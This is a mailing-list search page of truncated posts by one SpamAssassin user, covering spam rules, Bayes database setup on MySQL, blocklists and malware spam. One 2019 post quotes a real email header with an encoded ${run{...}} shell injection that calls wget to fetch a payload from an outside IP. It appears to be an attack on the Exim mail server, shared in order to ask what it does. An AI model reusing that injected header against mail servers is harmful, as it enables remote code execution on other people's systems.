Hi,
Here's also another 50+ headers we've collected over the years that I
believe started as a list from AXB 10+ years ago.
https://pastebin.com/raw/f6Fwh8HJ
dave
On 2/16/23 6:02 AM, Henrik K wrote:
On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote:
I was investigating a bunch of
Hi, Intuit's servers are being used to send Paypal phishing invoices
combined with the "evil numbers" scam.
https://pastebin.com/iad07S8N
Received: from o4.e.notification.intuit.com
(o4.e.notification.intuit.com [167.89.82.160])
X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5
That's a great call, thanks. I grepped my mail files and didn't find
any SPAM_99 headers in any of them.
You should be looking for BAYES_99 and BAYES_999 in your corpus.
Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox
/home/thomas.cameron/mail/INBOX/[mailbox file] and
You should probably check that none of your ham (i.e. non-spam)
messages contains SPAM_99 or SPAM_999. It can happen when spammers
poison your bayes database, and increased score in that case might
lead to legitimate mail being misclassified as a spam.
That's a great call, thanks. I grepped
For that matter how many know about 'apropos'? And, even if they do,
they may not discover 'locate' because 'apropos search' doesn't find
either 'updatedb' or 'locate'. You have to enter 'apropos find' to
discover that 'locate' exists, and even then you could get side tracked
into trying to
Invalid List-ID. You can then use that with other weirdness in a meta.
header __LIST_ID_DOMAIN_IN_BRACKETS List-id =~
/<([\w-]+)(\.[\w-]+)+>/
meta LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID &&
!__LIST_ID_DOMAIN_IN_BRACKETS
score LIST_ID_IMPROPER_FORMAT 0.001
describe
Hi,
Investigate adding the SEM_FRESH rules - this domain was created less
than five days ago.
https://spameatingmonkey.com/services
OK, how do I get those rules installed? I've only installed KAM rules
using a channel. I don't see anything similar for SEM rules. I see the
page you linked to
-2.5 RCVD_IN_HOSTKARMA_W RBL: Sender listed in HOSTKARMA-WHITE
[185.41.28.7 listed in
hostkarma.junkemailfilter.com]
We've reduced this score to -1 locally.
-1.0 BAYES_00 BODY: Bayes spam probability is 0 to 1%
Needs to be trained, obviously.
Hi Steve,
As Antony just reported, post these spamples to something like
pastebin.com then provide a link so we can view the raw email.
X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on
This is the first issue I see - you're likely missing a lot of
additional features of later
Hi,
RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED
RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE
RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL
Please audit your local config for score overrides and meta rules
depending on the old names.
I don't see that the VALIDITY rules exist yet. Will
On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote:
On Wed, 27 Jan 2021, Benny Pedersen wrote:
http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html
i dont know how to handle this :=)
On 26.01.21 17:43, John Hardin wrote:
Only one lists it:
Pedro, do you see sigs for it yet? We're seeing a ton of
Doc.Dropper.EmotetRed1220-9816007-0.
Have you submitted a sample to Steve at Sanesecurity and clamav?
Best,
Dave
On 1/13/21 10:39 AM, Pedro David Marco wrote:
Hi all...
sorry for the semi off-topic...
Today Emotet is being sent in an
Hi,
On 12/17/20 6:05 PM, Matt wrote:
Is there a way with spamassassin local.conf to add a higher score
based on source ip address or subnet? Basically the last IP in
"Received:" header.
bad_subnet_add_20_points: 192.168.240.0/24
Raising the score if that IP appeared anywhere in headers or
On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote:
On 11/24/20 12:40 PM, Axb wrote:
Fuglu supports Sophos AV
See fuglu.org
Sophos recently discontinued their support for SAVI on Linux. They now
only support "Server Central Intercept X Advanced" which is an entirely
different product.
I would
On 11/24/20 12:40 PM, Axb wrote:
Fuglu supports Sophos AV
See fuglu.org
Sophos recently discontinued their support for SAVI on Linux. They now
only support "Server Central Intercept X Advanced" which is an entirely
different product.
I would also be interested in newer/supported AV
Thanks for quick reply, but blacklist what?
The problem is I do not know this spammy domains.
I want to give a score when To: field is NOT in anyaddr...@mydomain.com
If only it were that easy.
You'll notice that recipients of this mailing list receive mail to the
mailing list address, not to
On 7/10/20 8:07 AM, Pedro David Marco wrote:
>On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb
wrote:
>so glad to read this... confirms my picture of you.
>now back my pet project: rewrite Tom Sawyer
OK... who starts??? :-)
once Finished we can rewrite "El Quixote" as well...
Hi all,
Malwarepatrol has just released a list of 13,000+ domains related to
coronavirus scams:
https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt
https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip
Anyone else have any rules or changes
Hi all,
LinuxSecurity just posted an article on the history of SpamAssassin and
its recent 18th anniversary, some of the new features coming in v4, and
speaks with some of the lead developers.
Hi all,
Anyone have a guess on what this is trying to accomplish?
From r...@sab.com Thu Jul 11 11:05:10 2019
Return-Path:
X-Original-To:
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Delivered-To: usern...@example.com
Received: by
On 12/8/18 1:58 PM, Csaba Banhalmi wrote:
Hi,
I upgraded to mysql and since then I can’t use bases db to score my
mails. Spam assassin -D says the following:
[12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations
for operation ' IN '
[12254] dbg: bayes: cannot use bayes on
5.7 URIBL_BLACK Contains an URL listed in the URIBL blacklist
[URIs: stackexchange.com]
I guess that's not supposed to be like that. I can't change anything at
it, just for information for somebody in the position to fix that.
It is indeed
Hi,
On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote:
One slipped through, with this subtle sig line (thought it might brighten
someones day . . . )
"Note: Failure to Verify will lead to final termination of your email account.
Technical Team
Email Administrator
All Right Reversed 2018.(c)"
Hi,
Excellent... except for one potential problem... this is in their
"foxhole_all.cdb" file which they label as "high false positive risk"
- which could scare some away!
For those who don't score very high on ClamAv and/or who are able to
score DIFFERENTLY based on different types of
Hi, while learning an mbox on a recent 3.4.2 svn:
# sa-learn --spam --progress --mbox junk-012618
28% [==
]
5.53 msgs/sec 00m44s LEFTUse of uninitialized value in lc at
On 11/17/2017 11:39 AM, Jari Fredriksson wrote:
David Jones kirjoitti 16.11.2017 kello 15.22:
REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install
REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz
(reload/restart whatever is calling SA -- spamd, amavis-new,
mimedefang,
MailScanner, etc.)
I have
Hi,
I've posted the spamfilter.sh file to http://pasted.co/7b794ccd
I don't see anything in there about verbose logging, but there are
two lines in there with a resemblance to your suggestion:
logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to
SpamAssassin:
og file is up to 165 Gb.
You should look at your logging and/or log rotating system to get this
under control. I believe that's going to be /etc/logrotate.d/
Regards,
Dave
Kind regards.
Jim.
On 04/04/17 22:41, Dave Wreski wrote:
Hi,
My set up consists of Pos
Hi,
My set up consists of Postfix, Postgrey, Spamassassin, Clam-AV,
Amavis-new and Dovecot.
What is "spamfilter"?
Apr 2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info:
spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5
What operating system?
Regards,
Hi,
having the regex into a variable would help maintenance. Something like:
$BankList = "Bank1|Bank2|Bank3|Bank4"
uri BANKURI /$BankList/i
score BANKURI0.2
body BANKBODY /$BankList/i
score BANKBODY0.1
is there any way to do this?
You might try something like
clamdscan -c /etc/clamd.d/scan.conf eicar.txt
/home/dan/eicar.txt: lstat() failed: Permission denied. ERROR
It looks to be related to clamdscan performing a chroot() and the files
you're referencing not being available from within that chroot. Try
passing the --stream option.
-bash-4.3$
Hi,
On 10/14/2015 06:08 PM, Dianne Skoll wrote:
On Wed, 14 Oct 2015 17:51:23 -0400
Alex wrote:
I'd like to make sure incoming mail that appears to be "From:" one of
our internal users has indeed gone through one of the systems
specified in the SPF record, resulting in
Hi,
blacklist_from *@*.allisonarctictrips.com
spf-pass take responselily
Yes, after it's received, there are a ton of things that could be done
to block it (including my local RBL). I was hoping for something
preventative.
Eh? I'm afraid I don't get this at all - greylisting and RBL
On 06/26/2015 12:45 PM, Benny Pedersen wrote:
Alex Regan skrev den 2015-06-26 18:33:
http://pastebin.com/FzUkEvRp
blacklist_from *@*.allisonarctictrips.com
spf-pass take responselily
Yes, after it's received, there are a ton of things that could be done
to block it (including my local
Hi,
$self-{main}-{registryboundaries}-uri_to_domain($fubar);
This appears to fix DecodeShortURLs.pm
--- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400
+++ DecodeShortURLs.pm 2015-05-15 11:39:35.020499066 -0400
@@ -486,7 +486,8 @@
Hi,
RH i don't know the UK laws but in germany it's for sure not allowed
RH because it's legally classified identical to a postman says meh i
don't
RH walk to go upstairs today and throw the letter away
RH if you pretend to provide relieable mailservices it should be
logically
RH that discard
On 02/13/2015 05:29 PM, Dave Pooser wrote:
On 2/13/15, 4:27 PM, Dave Wreski dwre...@guardiandigital.com wrote:
I thought I would send this on to you instead of broadcasting it.
You thought wrong :-)
Yeah, thanks
One too many emails after reading spam for the last twelve hours
dave
Hi John,
I thought I would send this on to you instead of broadcasting it.
I just received an email with an odd URL. It contained what appears to
be a non-ASCII character simulating a period, or at least one that is
not part of the standard set.
http://pastebin.com/x6TGNpD7
a
21 || :
/bin/systemctl try-restart spamassassin.service /dev/null 21 || :
%endif
%changelog
* Wed Feb 12 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-20
- Update to production release
- Build for fedora-17
* Wed Jan 08 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-19
- Update SVN
Hi,
I noticed that the site that provided the malware.blocklist.cf has
been unavailable since at least the 8th of August.
URL for the file was on http://www.malware.com.br/cgi/submit?action=list_sa
The FQDN no longer resolves to an address. I have tried our local DNS,
Level3 4.2.2.2
Hi,
Finally found that they changed their name a few months ago, and
finally
they turned off the .com.br site.
http://www.malwarepatrol.net/
wget http://www.malwarepatrol.net//cgi/submit?action=list_sa;
Aren't these the same rules that are already present in the sanesecurity
clamav db?
Hear is the typical hits I get on a message:
X-Spam-Status: No, score=3.4 required=5.0 tests=BODY_8BITS,HTML_MESSAGE,
MIME_HTML_ONLY,RCVD_IN_BRBL_LASTEXT,RP_MATCHES_RCVD,SPF_PASS
autolearn=no
version=3.3.1
...
X-Spam-Status: No, score=4.6 required=5.0
Hi,
since so many have problems i share my mysql shemas :=)
`token` binary(5) NOT NULL,
Yes, the binary or varbinary is the key to a solution here.
Mucking with utf-8 vs latin-1 is just covering but not solving
the most glaring problem here, namely that a token must not be
associated with
Hi,
ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
It's now working, but is excruciatingly slow. Is this also just covering
the problem, or will this be a usable solution when it finally finishes?
Just being curious: are you using
bayes_store_module
Hi,
dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
I have opened three bug entries, the first one is directly in response
to this problem report and brings a fix:
[Bug 6624] BayesStore/MySQL.pm fails to
Hi,
dbg: bayes: error inserting token for line: t 1 0 1308114254
4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected number
of rows. [repeats ...]
Which version of MySQL?
Did you remember to replace TYPE=MyISAM with TYPE=InnoDB in the
schema (according to README.bayes) if you are
Hi,
It looks like that may be my problem too. This is the result with your
patch:
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using
Hi,
since so many have problems i share my mysql shemas :=)
please note that i expire som data not default done in current spamassassin
Your schema did not work for me. I deleted the existing database and
recreated it, then created the tables using your schema. When starting
to restore, a
Hi,
I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to
convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:
dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected
Hi,
This one is the current SQL schema and works
http://svn.apache.org/repos/asf/spamassassin/tags/spamassassin_current_release_3.3.x/sql/bayes_mysql.sql
- Lawrence
On 20/06/2011 7:34 PM, Dave Wreski wrote:
Hi,
I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
Hi,
I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
to convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:
dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected
Hi,
since some days my servers are hit by 50.000-80.000 Spams a day and for
some minutes they have spamed today 18 accounts out of 98.000 with MORE then
100.000 spams.
All spams coming from the same network:
xxx.root.static.coolserver.info
xxx.root.static.starsweet.info
where xxx
Marc,
You can also find the readme for sql support there, or check out:
http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/README.bayes
It's quite easy to setup and get running.
I can't seem to find the bayes_mysql.sql file anywhere.
Depending on your distribution it could be in
54 matches
Mail list logo